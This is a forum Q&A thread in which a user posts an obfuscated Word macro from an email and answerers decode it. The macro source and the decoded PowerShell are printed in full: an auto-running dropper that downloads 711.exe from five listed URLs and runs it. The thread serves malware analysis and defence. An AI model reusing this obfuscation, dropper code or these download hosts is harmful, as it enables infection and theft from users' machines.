TheStrangeQuark


What does this Visual Basic code do? Microsoft word macro

I received an email with a word document that had some built in macros. I disabled them and checked them out. The code all looks like gibberish, but maybe someone else can help me figure out what it's doing?

This is on Microsoft word objects:

' Entry point: Word raises Document_open automatically when the file is opened
' (once macros are enabled), so no further user interaction is needed.
Private Sub Document_open()
' Line-continued spelling of "On Error Resume Next": every runtime error from
' here on is silently ignored, which is what lets the decoy calls below fall
' through instead of aborting the macro.
On _
Error _
Resume _
Next
   ' Decoy filler. Second is VBA's built-in Second(time) function; feeding it a
   ' random string raises a runtime error that the handler above swallows, so
   ' each of these lines does nothing. They only pad the code for AV scanners.
   Second "zFpiVaXZHXwfhz" + "U" + "2692" + "Zt"
   Second "uqwSRYVhz" + "387021345" + "kzB" + "8730"
   Second "kz" + "1499" + "tkAh" + "p"
   Second "P" + "8389"
   Second "4180" + "jmCmdHzM" + "IcRbPsSnK" + "bWtnR"
   Second "357881955" + "3117" + "ijHmwpiFZCcjw" + "bvt"
' The only effective statement. The three module-level functions each return
' one slice of a cmd.exe command line; the slices are concatenated and passed
' to Shell with window style vbHide, so nothing is shown to the user while it
' runs.
Shell KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)
   ' More decoy filler (same no-op Second calls as above).
   Second "pqENJzbA" + "208599822" + "Ovav" + "A"
   Second "HmjZtUmz" + "7073"
   Second "hYRErMnn" + "4277"
End Sub

This is on Modules:

' Builds the first slice of the command line that Document_open passes to Shell.
' Only the string assignments matter; every Second line is filler.
Function KlXaMrm()

' Line-continued "On Error Resume Next": runtime errors are ignored.
On _
Error _
Resume _
Next
' Decoy Second calls: each raises a swallowed runtime error and has no effect.
Second "IVozFsCNdj" + "muE"
   Second "wwrMmsOX" + "ii"
   Second "7048" + "RLBLOvif"
   Second "315289259" + "bGl" + "wcZUd" + "8842"
' Letter hiding: Chr(9+16+4+2+68) = Chr(99) = "c", Chr(6+11+3+1+46) = Chr(67) = "C",
' Chr(3+5+1+0+25) = Chr(34) = the double quote; Format() on a string returns it
' unchanged. Read together this is: cmd /V^:O/C"^s^e^t ^WvU^y=^ ... — start
' cmd with delayed variable expansion (/V), run one command (/C) and begin
' assigning the payload text to the variable WvUy. The carets are cmd's escape
' character and vanish when the line is parsed, so they only break up keywords.
bkzhl = Format(Chr(9 + 16 + 4 + 2 + 68)) + "md /V" + "^:O/" + Format(Chr(6 + 11 + 3 + 1 + 46)) + Format(Chr(3 + 5 + 1 + 0 + 25)) + "^" + "s^" + "e^" + "t ^WvU^" + "y=^  " + " ^  ^ " + "^   " + "^   ^ "
Second "IWV" + "FalMBYmN" + "6772" + "vIi"
   Second "BfMwfQziXwj" + "fvQGQha"
   Second "hBcrV" + "380436099"
' From here on, each assignment is one caret-laced slice of the payload text,
' stored in reverse character order (the for /L loop appended by bMdNCkVCVn
' restores the order at runtime). Spreading it over many variables with filler
' in between keeps any single literal from looking like a command.
ipaSHnJ = " " + "^ ^ ^ " + "}" + "}" + "^{" + "^h" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^" + "ta" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "};" + "^k^a^"
Second "31392559" + "BMS"
kVaBhn = "e" + "r^b;Yu" + "r^$ " + "^m^e^tI" + "^-e" + "k" + "o" + "vnI^;"
Second "965" + "5880" + "XJTdjHJSV" + "Abrh"
HzutiHjFO = ")Y^u" + "r^" + "$ ^,^pN" + "B^" + "$" + "(^eliF" + "d"
Second "E" + "5438"
   Second "MhjZXFtjz" + "52832268"
zBPwbjSP = "^a" + "^olnwoD" + ".j^" + "p^X$^{^" + "yr"
Second "oWcn" + "1454"
   Second "UmZTRVGRUadD" + "7070" + "Hb" + "Z"
   Second "GiNa" + "EjiBfz"
   Second "ZLiR" + "iSRc" + "LaHCfQjrI" + "467392171"
   Second "376971481" + "ATq"
wZvZZZCL = "^t{" + ")" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^oi$^" + " n^i" + "^" + " ^pN" + "B^$(h" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^a" + "^e" + "r^o^f^;" + "'" + "^e^x^e"
Second "1426" + "2730" + "131359904" + "2661"
   Second "tZ" + "A"
FVkwvLXivOm = "^.^'+^f" + "aw" + "^$+" + "'\'^+" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "i^" + "l" + "^" + "b^u^p:v"
Second "obmhCVWdl" + "1876"
LEFDwJt = "n" + "e^$^=Y" + "^ur^$;'" + "^1^" + "1^7" + "^' =^ " + "f^aw$;" + ")^'@^" + "'(" + "t" + "ilp^S.^"
Second "mHz" + "2845" + "swVQqO" + "sTaM"
   Second "151506295" + "9519"
   Second "530531760" + "421003665" + "33902179" + "zE"
UjhKfLskOAw = "'^" + "D^GoP/" + "m" + "^o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "." + "^t"
Second "1424" + "AS" + "qWRt" + "jTfL"
   Second "144" + "385570591" + "YNItdvcRQLGKl" + "273801574"
   Second "8474" + "427918883" + "101014623" + "2181"
oHsEGJKpH = "^o" + "^p^" + "sno" + "r^i" + "//:p^t" + "t^h^@j" + "fW^FVF^" + "8r/m^" + "o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "." + "e^u" + "v" + "^"
Second "LIdEK" + "9208"
   Second "GHY" + "w"
   Second "licB" + "57965560" + "BkiEX" + "uNEQdXXBb"
wIVBCzu = "ero^o^" + "b" + "a^keep" + "/" + "/^:^p^"
' Glue the slices back together in source order and return them.
KlXaMrm = bkzhl + ipaSHnJ + kVaBhn + HzutiHjFO + zBPwbjSP + wZvZZZCL + FVkwvLXivOm + LEFDwJt + UjhKfLskOAw + oHsEGJKpH + wIVBCzu
   Second "kmpQXLAuN" + "fh" + "365194270" + "n"
   Second "70996280" + "nJ"
   Second "QTviGhI" + "RV" + "315865801" + "UcJFQ"
End Function
' Builds the second slice of the command line: the remaining reversed payload
' text, followed by the cmd loop that un-reverses it and runs the result.
Function bMdNCkVCVn()

' Line-continued "On Error Resume Next": runtime errors are ignored.
On _
Error _
Resume _
Next
' Decoy Second calls: swallowed runtime errors, no effect.
Second "FddKlw" + "OTSBodYZZ"
' Reversed, caret-laced payload slices continue here (Chr(9+16+4+2+68) is
' again Chr(99) = "c", hidden as arithmetic).
PpRpwRnf = "tth^" + "@uj^l^" + "h^o" + "/m^" + "o" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^.^" + "gn" + "^it" + "nia^p"
Second "wCkfREKOG" + "AfRUmpAd" + "WL" + "GICb"
   Second "rBzjjYzi" + "zL"
LOkOMzwwZEb = "m^ot^su" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ra" + "^" + "t^sen^" + "o" + "^l//^:" + "p^t^t" + "h"
Second "rlTmjU" + "jYwjHViv" + "dqjiW" + "c"
   Second "WHUDRQuddUoQr" + "lIcDDYCTjsUVWs" + "4956" + "mJ"
   Second "9262" + "171867944" + "464524065" + "7760"
WnITU = "^@u^A" + "/^ur.^m" + "b^s-t" + "^evs^" + "s" + "^ar" + "//^:p^t" + "th" + "@^F^p2G" + "^zx^W/^"
Second "184947357" + "wjOV"
   Second "5399" + "jwuBT"
   Second "402560265" + "449" + "l" + "BBBuHZnMK"
   Second "MrA" + "nMwkzNbY" + "429759967" + "bqC"
WsfkNBcA = "mo" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^.k" + "ro" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ege" + "l^lo" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "sn" + "i" + "^t" + "r^a^mt^" + "s//" + ":p" + "^t" + "^"
Second "534498195" + "HX" + "vwKkqLAvKmm" + "279702571"
   Second "KYJPBi" + "ivTUzZOfj" + "162850888" + "WbZ"
' Last reversed slice: with carets stripped it reads
' th'=coi$;tneilCbeW.teN tcejbo-wen=jpX — i.e. the start of the PowerShell
' text, "$Xpj=new-object Net.WebClient;$ioc='ht", backwards.
' Chr(6+11+3+1+46) = Chr(67) = "C" (the C of WebClient).
RqVln = "th'^=" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "^oi^$" + ";^" + "t" + "n^e^i" + "^l" + Format(Chr(6 + 11 + 3 + 1 + 46)) + "be^W" + "^.t^e" + "N^ t" + Format(Chr(9 + 16 + 4 + 2 + 68)) + "ejb^o" + "-^w^e" + "n=" + "^j" + "pX^"
Second "fbvS" + "F"
   Second "BmJt" + "Y"
   Second "z" + "qlRwULuPK" + "NE" + "2370"
   Second "467432993" + "510382039" + "V" + "357745589"
' "$ llehsrewop" is "powershell $" backwards and ends the set WvUy=... value;
' "&&fo" (continued below as "for") starts the decoder that follows.
TTWnMmnb = "$ ll^e" + "h^s" + "r^e^w^" + "o^p" + "&&" + "^f^o"
Second "FQvcEKz" + "IN" + "419878734" + "aWRD"
   Second "Gs" + "qiWjuwsKkDzj"
   Second "w" + "iZv" + "ri" + "jbl"
' Decoder, carets removed: for /L %5 in (373,-1,0) do set 31=!31!!WvUy:~%5,1!
' — walks WvUy from its last character (index 373) down to index 0, appending
' one character per step to variable 31, so 31 ends up holding the payload in
' readable order. This relies on the /V (delayed expansion) switch set earlier.
HuAjss = "r /L" + " %^5" + " ^" + "in (^" + "37" + "^3,-" + "^1,^0)^" + "do s^e^" + "t" + " 3^1=!3"
Second "IIz" + "pwb" + "OiIRoWEPKvRSu" + "fLYzMV"
   Second "I" + "5470" + "uC" + "vzYpG"
   Second "Prm" + "D"
' ... && if %5==0 call %31:*31!=%  — once the counter reaches 0 the rebuilt
' string (now starting with "powershell") is executed via call. The :*31!=
' substitution looks like a parse-time trick rather than a real edit of the
' value — TODO confirm; the net effect is that variable 31 is run.
vWYHrcNLA = "^" + "1!!" + "^WvU^y" + ":~%^5" + ",1!&" + "&i" + "^" + "f %^5" + "=^=^0" + " " + Format(Chr(9 + 16 + 4 + 2 + 68)) + "a^l^l"
Second "QqFfMn" + "mmslG"
fGbIAE = " " + "%3^1:" + "*^" + "3^1^" + "!^"
' Glue the slices back together in source order and return them.
bMdNCkVCVn = PpRpwRnf + LOkOMzwwZEb + WnITU + WsfkNBcA + RqVln + TTWnMmnb + HuAjss + vWYHrcNLA + fGbIAE
   Second "kWluI" + "lFK"
   Second "FoYWtEQUo" + "SPqoT" + "m" + "1515"
   Second "QHGQ" + "f"
End Function
' Builds the tail of the command line: =%"  (two trailing spaces).
' Chr(3+5+1+0+25) = Chr(34) is the double quote that closes the /C"..." string
' opened in KlXaMrm; the "" appended at the end is empty and does nothing.
Function zZZwVld()

' Line-continued "On Error Resume Next": runtime errors are ignored.
On _
Error _
Resume _
Next
' Decoy Second calls: swallowed runtime errors, no effect.
Second "15045220" + "Cfku" + "finOQwh" + "mUISHvGpDwIp"
   Second "297480629" + "wXWqc"
   Second "RJ" + "1178" + "XfKGfw" + "znaVlIj"
sFjEfzuO = "=%" + Format(Chr(3 + 5 + 1 + 0 + 25)) + "  " + ""
zZZwVld = sFjEfzuO
   Second "7008" + "530276898"
End Function

I'm guessing this is malicious, but I'm not too familiar with Visual Basic. I'm also not sure if this is the right place to be asking about this.



Answers (2)

GSerg


All lines that begin with Second are noise: each one causes a runtime error (silently ignored because of the On Error Resume Next at the top) and does nothing. They only exist to confuse antivirus scanners.

If you remove them all, you are left with a bunch of string assignments. They all add up to the following string in the end:

cmd /V^:O/C"^s^e^t ^WvU^y=^   ^  ^ ^   ^   ^  ^ ^ ^ }}^{^hc^tac};^k^a^er^b;Yur^$ ^m^e^tI^-ekovnI^;)Y^ur^$ ^,^pNB^$(^eliFd^a^olnwoD.j^p^X$^{^yr^t{)c^oi$^ n^i^ ^pNB^$(hc^a^er^o^f^;'^e^x^e^.^'+^faw^$+'\'^+ci^l^b^u^p:vne^$^=Y^ur^$;'^1^1^7^' =^ f^aw$;)^'@^'(tilp^S.^'^D^GoP/m^oc.^t^o^p^snor^i//:p^tt^h^@jfW^FVF^8r/m^oc.e^uv^ero^o^ba^keep//^:^p^tth^@uj^l^h^o/m^oc^.^gn^itnia^pm^ot^sucra^t^sen^o^l//^:p^t^th^@u^A/^ur.^mb^s-t^evs^s^ar//^:p^tth@^F^p2G^zx^W/^moc^.krocegel^locsni^tr^a^mt^s//:p^t^th'^=c^oi^$;^tn^e^i^lCbe^W^.t^eN^ tcejb^o-^w^en=^jpX^$ ll^eh^sr^e^w^o^p&&^f^or /L %^5 ^in (^37^3,-^1,^0)^do s^e^t 3^1=!3^1!!^WvU^y:~%^5,1!&&i^f %^5=^=^0 ca^l^l %3^1:*^3^1^!^=%"  

This is a shell command that runs cmd with the switches /V:O (delayed variable expansion, which the !…! syntax used later depends on) and /C "<obfuscated command>".
All carets can be deleted from it, because all they do is instruct cmd to treat the next character literally; they are only there to break up recognisable keywords.

The obfuscated command stores a reversed PowerShell script in an environment variable (WvUy), reverses it back at runtime with the for /L loop that walks the string from index 373 down to 0, and launches the result.

The Powershell script that ends up executing is:

# Deobfuscated payload (as reconstructed above): a download-and-execute loop.
$Xpj=new-object Net.WebClient;
# Five candidate download URLs, joined with '@' and then split into an array,
# so the loop below can fall back to the next host if one fails.
$ioc='http://stmartinscollegecork.com/WxzG2pF@http://rassvet-sbm.ru/Au@http://lonestarcustompainting.com/ohlju@http://peekaboorevue.com/r8FVFWfj@http://ironspot.com/PoGD'.Split('@');
$waf='711';
# Drop path: <Public profile folder>\711.exe.
$ruY=$env:public + '\' + $waf + '.exe';
# Try each URL in turn; any failure is swallowed by the empty catch and the
# next URL is tried. The first successful download+launch ends the loop.
foreach($BNp in $ioc) {
    try {
        # Save the response body to the drop path, then open it — for an .exe,
        # Invoke-Item runs it.
        $Xpj.DownloadFile($BNp, $ruY);
        Invoke-Item $ruY;
        break;
    }catch{}
}

For each of the listed URLs in turn, it tries to download a file, save it into the Public folder as 711.exe and run it. It stops after the first URL for which this succeeds.


Vityata


Delete it!

The code gets activated whenever you open the document (Document_open). It does indeed look like some kind of virus; it is malicious. If you want to see what it does, replace the following line:

Shell KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)

with:

MsgBox KlXaMrm + bMdNCkVCVn + zZZwVld, CStr(vbHide)

and look at the MsgBox. Or better, delete it: there could be some other code somewhere else which is calling some Shell command as well, and then you would most probably need to reinstall your PC.

